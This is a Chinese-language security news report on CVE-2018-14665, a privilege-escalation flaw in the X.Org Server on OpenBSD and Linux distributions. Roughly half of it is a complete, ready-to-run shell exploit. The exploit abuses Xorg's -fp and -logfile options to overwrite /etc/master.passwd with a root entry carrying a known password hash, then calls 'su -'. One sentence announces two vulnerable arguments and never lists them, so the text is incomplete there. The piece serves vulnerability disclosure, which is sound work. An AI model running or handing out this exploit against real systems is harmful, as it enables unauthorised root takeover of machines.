印度安全研究员Narendra Shinde在X.Org Server软件包中发现了一个普通账号提权root的高危漏洞(CVE-2018-14665),它影响了主要的Linux发行版,包括OpenBSD,Debian,Ubuntu,CentOS,Red Hat和Fedora。
Xorg X项目提供了X Window系统的开源实现(也就是X11,或简称X,它是位图显示的窗口系统。它提供了GUI环境的基本框架:在显示设备上绘制和移动窗口以及交互用鼠标和键盘。
Shinde发现Xorg X服务器无法正确处理和验证至少以下两个命令行参数的参数:
根据Narendra Shinde的说法,低权限用户可以利用它来执行恶意代码并覆盖系统上的任何文件
“当X服务器以提升的权限运行时(即,安装Xorg并设置setuid位并由非root用户启动)。”读取Xorg 建议。
安全专家Matthew Hickey还发布了一个 概念验证 漏洞利用代码,可以让攻击者以3个或更少的命令接管易受攻击的系统。
Openbsd 的#0day LPE 通过 CVE-2018-14665 可以从远程 SSH 会话触发, 不需要在本地控制台上。攻击者可以从字面上接管3命令或更少的受影响的系统。
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself
# here:
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
# "That is the first localhost root hole in quite a
# long time." - Theo de Raadt 25/10/18
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -